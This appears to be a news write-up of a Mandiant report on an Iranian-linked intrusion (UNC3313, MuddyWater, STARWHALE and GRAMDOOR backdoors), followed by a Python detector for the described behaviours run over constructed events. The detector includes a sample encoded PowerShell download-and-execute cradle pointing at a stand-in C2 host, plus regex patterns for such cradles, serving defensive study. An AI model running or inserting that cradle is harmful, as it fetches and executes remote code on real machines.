
In November 2021, an Iranian-nexus threat actor was found to have deployed two previously unseen pieces of targeted malware with "simple" backdoor functionality as part of an intrusion into an unnamed government entity in the Middle East.
Cybersecurity firm Mandiant attributes the activity to an uncategorized cluster it tracks as UNC3313, which it assesses with "moderate confidence" to be associated with the state-sponsored group MuddyWater.
“UNC3313 monitors and collects strategic information to support Iranian interests and decision-making,” said researchers Ryan Tomczyk, Emiel Hegebarth and Tufail Ahmed. “Guidance schemes and their associated decoys show a strong focus on targets with a geopolitical connection.”
In mid-January 2022, MuddyWater (aka Static Kitten, Seedworm, TEMP.Zagros or Mercury) was characterized by U.S. intelligence agencies as a subordinate element of Iran's Ministry of Intelligence and Security (MOIS) that has been active since at least 2018 and is known to use a wide range of tools and techniques in its operations.
The attacks are said to have used spear-phishing messages to gain initial access, followed by offensive security tools and publicly available remote access software to move laterally and maintain access to the environment.
The phishing emails used a job-promotion lure and tricked multiple victims into clicking a URL to download a RAR archive hosted on OneHub, which paved the way for the installation of ScreenConnect, a legitimate remote access tool, to gain a foothold.
“UNC3313 quickly established remote access using ScreenConnect to infiltrate systems within an hour of the initial compromise,” the researchers noted, adding that the security incident was quickly contained and resolved.
Subsequent stages of the attack involved privilege escalation, internal reconnaissance of the target network, and the execution of obfuscated PowerShell commands to download additional tools and payloads onto remote systems.
Also discovered was a previously undocumented backdoor called STARWHALE, a Windows Script File (.WSF) that executes commands received from a hard-coded command-and-control (C2) server via HTTP.
The other implant delivered in the attack is GRAMDOOR, so named because it uses the Telegram API for its network communications with an attacker-controlled server in an attempt to evade detection, further underscoring the abuse of legitimate communication tools to facilitate data exfiltration.
… government, the oil and gas sector and telecommunications around the world.
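The behaviours described above (a .WSF backdoor run by the Windows Script Host, encoded PowerShell used to pull down further payloads, an unexpected ScreenConnect install, and Telegram API traffic coming from something that is not a browser or messaging client) all show up in ordinary endpoint telemetry. The script below is an added example, not code from Mandiant or from the report, of a minimal behavioural detector run over constructed Sysmon-style events. The event shape, the process allow-list, the file paths and the sample encoded PowerShell are assumptions for illustration; none of the values are indicators from the actual intrusion, and the STARWHALE C2 address is deliberately not guessed.

```python
import base64
import re

# Constructed sample telemetry (assumed, simplified Sysmon-style records;
# not events from the Mandiant report or from any real host).
PS_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2.ps1')"
# PowerShell -EncodedCommand takes the base64 of the UTF-16LE script text.
ENCODED_SAMPLE = base64.b64encode(PS_SAMPLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"event": "process_create",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\AppData\Roaming\update.wsf"'},
    {"event": "process_create",
     "image": r"C:\Program Files (x86)\ScreenConnect Client (f00)\ScreenConnect.ClientService.exe",
     "cmdline": "ScreenConnect.ClientService.exe"},
    {"event": "network_connect",
     "image": r"C:\Users\user\AppData\Local\Temp\svc.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    {"event": "network_connect",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED_SAMPLE},
    {"event": "process_create",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Processes that legitimately talk to the Telegram API on a typical
# workstation (assumed allow-list; tune it to your environment).
TELEGRAM_ALLOWED = {"chrome.exe", "msedge.exe", "firefox.exe", "telegram.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|IEX|Invoke-Expression|FromBase64String)\b",
    re.IGNORECASE)
ENC_FLAG = re.compile(r"(?:-e|-ec|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev):
    """Apply the behavioural rules to one event; return a list of (rule, detail)."""
    findings = []
    image = ev.get("image", "")
    name = basename(image)
    if ev["event"] == "process_create":
        cmd = ev.get("cmdline", "")
        # STARWHALE-style: a .wsf executed through the Windows Script Host.
        if name in SCRIPT_HOSTS and ".wsf" in cmd.lower():
            findings.append(("wsf_script_host", cmd))
        # A remote access tool the environment does not expect to see.
        if "screenconnect" in image.lower():
            findings.append(("remote_access_tool", image))
        # Encoded PowerShell whose plaintext is a download cradle.
        if name in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(cmd)
            if decoded and DOWNLOAD_CRADLE.search(decoded):
                findings.append(("encoded_powershell_download", decoded))
    elif ev["event"] == "network_connect":
        # GRAMDOOR-style: the Telegram API reached by a process that is
        # neither a browser nor a messaging client.
        host = ev.get("dest_host", "").lower()
        if host == "api.telegram.org" and name not in TELEGRAM_ALLOWED:
            findings.append(("telegram_api_from_unexpected_process", f"{image} -> {host}"))
    return findings


def analyze(events):
    return [{"rule": rule, "image": ev["image"], "detail": detail}
            for ev in events for rule, detail in analyze_event(ev)]


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['image']}: {f['detail']}")
```

Run against the constructed events, the script raises four findings and stays quiet on the Chrome connection to api.telegram.org and on notepad.exe. The encoded-PowerShell rule is the one worth copying: matching on the `-enc` flag alone produces noise from legitimate automation, so the rule decodes the UTF-16LE payload first and only alerts when the plaintext contains a download or execution primitive.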